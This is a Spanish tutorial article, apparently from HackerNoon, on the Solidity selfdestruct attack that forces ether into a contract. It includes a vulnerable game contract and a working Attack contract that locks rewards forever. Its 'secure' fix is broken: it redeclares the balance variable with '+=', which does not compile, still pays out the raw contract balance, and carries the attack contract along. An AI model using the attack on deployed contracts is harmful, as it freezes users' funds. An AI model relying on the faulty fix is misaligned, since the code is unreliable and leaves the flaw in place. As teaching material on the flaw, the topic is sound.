La función de   elimina todo el código de bytes de la dirección del contrato y envía todo el éter almacenado a la dirección especificada. Si esta dirección especificada también es un contrato, no se llama a ninguna función (incluida la alternativa). selfdestruct(address)  En otras palabras, un atacante puede crear un contrato con una función   , enviarle ether, llamar a   y forzar el envío de ether a un objetivo. selfdestruct() selfdestruct(target)  Veamos cómo puede verse este ataque. Creamos un contrato inteligente simple. Nota: Creé este contrato basado en   . Solidity by example   // SPDX-License-Identifier: MIT pragma solidity ^0.8.10; contract EtherGame { uint public targetAmount = 5 ether; address public winner; function play() public payable { require(msg.value == 1 ether, "You can only send 1 Ether"); uint balance = address(this).balance; require(balance <= targetAmount, "Game is over"); if (balance == targetAmount) { winner = msg.sender; } } function claimReward() public { require(msg.sender == winner, "Not winner"); (bool sent, ) = msg.sender.call{value: address(this).balance}(""); require(sent, "Failed to send Ether"); } } contract Attack { EtherGame etherGame; constructor(EtherGame _etherGame) { etherGame = EtherGame(_etherGame); } function attack() public payable { address payable addr = payable(address(etherGame)); selfdestruct(addr); } }  Este contrato representa un juego simple en el que los jugadores envían 1 ether al contrato con la esperanza de ser el que alcance el umbral igual a 5 eth.  Cuando se alcanza el 5 º, el juego finaliza y el primer jugador que alcanza el hito puede reclamar una recompensa.  En este caso, un atacante puede, por ejemplo, enviar al contrato 5 eth o cualquier otro valor que empuje el saldo del contrato por encima del umbral. Esto bloquearía todas las recompensas en el contrato para siempre.  Esto se debe a que nuestra instrucción if en la función   verifica si el saldo del ganador es igual a 5 eth. play()  Técnicas Preventivas  Esta vulnerabilidad surge del mal uso de   . Su contrato debe evitar depender de los valores exactos del saldo del contrato porque puede ser manipulado artificialmente. this.balance  Si se requieren valores exactos de éter depositado, se debe usar una variable autodefinida que se incremente en funciones pagaderas, para rastrear de manera segura el éter depositado. Esto puede evitar que su contrato se vea afectado por el éter forzado enviado a través de una llamada de   . selfdestruct()  Veamos cómo se ve la versión segura del contrato.   // SPDX-License-Identifier: MIT pragma solidity ^0.8.10; contract EtherGame { uint public targetAmount = 5 ether; address public winner; uint public balance; function play() public payable { require(msg.value == 1 ether, "You can only send 1 Ether"); uint balance += msg.value; require(balance <= targetAmount, "Game is over"); if (balance == targetAmount) { winner = msg.sender; } } function claimReward() public { require(msg.sender == winner, "Not winner"); (bool sent, ) = msg.sender.call{value: address(this).balance}(""); require(sent, "Failed to send Ether"); } } contract Attack { EtherGame etherGame; constructor(EtherGame _etherGame) { etherGame = EtherGame(_etherGame); } function attack() public payable { address payable addr = payable(address(etherGame)); selfdestruct(addr); } }  Aquí, ya no tenemos ninguna referencia a   . En su lugar, hemos creado una nueva variable,   , que realiza un seguimiento de la cantidad actual de eth. this.balance balance  Fuente   https://solidity-by-example.org/hacks/autodestrucción/   https://blog.sigmaprime.io/solidity-security.html#ether  Publicado anteriormente  aquí.

Target

2022 - HackerNoon Contributor of the Year - Ethereum

2022 - HackerNoon Contributor of the Year - Programming

2022 - HackerNoon Contributor of the Year - Security

2022 - HackerNoon Contributor of the Year - Smart Contracts

2022 - HackerNoon Contributor of the Year - Solidity

Do not forget to follow me 

Nominated for 2022 - HackerNoon Contributor of the Year - Ethereum

Nominated for 2022 - HackerNoon Contributor of the Year - Smart Contracts

Nominated for 2022 - HackerNoon Contributor of the Year - Solidity

Nominated for 2022 - Software Developer of the Year

Nominated for 2022 - HackerNoon Contributor of the Year - Programming

Nominated for 2022 - HackerNoon Contributor of the Year - Security

Este audio es producido en el idioma original de la historia!

Demasiado Largo; Para Leer

Cómo hackear contratos inteligentes: autodestrucción y solidez

Cómo hackear contratos inteligentes: autodestrucción y solidez

About Author

COMENTARIOS

ETIQUETAS

ESTE ARTÍCULO FUE PRESENTADO EN

Related Stories

Navegando por las aguas: desarrollo de aplicaciones RAG de nivel de producción con lagos de datos

¿Quieres ganar un concurso de redacción de HackerNoon? Esto es lo que recomiendan los ganadores del concurso #crypto-api

Creación de productos criptográficos centrados en el usuario: la importancia de los comentarios de los clientes

La fuga rápida del sistema Claude Sonnet 3.5: un análisis forense

Navegando por las aguas: desarrollo de aplicaciones RAG de nivel de producción con lagos de datos

¿Quieres ganar un concurso de redacción de HackerNoon? Esto es lo que recomiendan los ganadores del concurso #crypto-api

Creación de productos criptográficos centrados en el usuario: la importancia de los comentarios de los clientes

La fuga rápida del sistema Claude Sonnet 3.5: un análisis forense

Light-Mode

Classic

Newspaper

Minty

Dark-Mode

Neon Noir

Minty

HN StartUps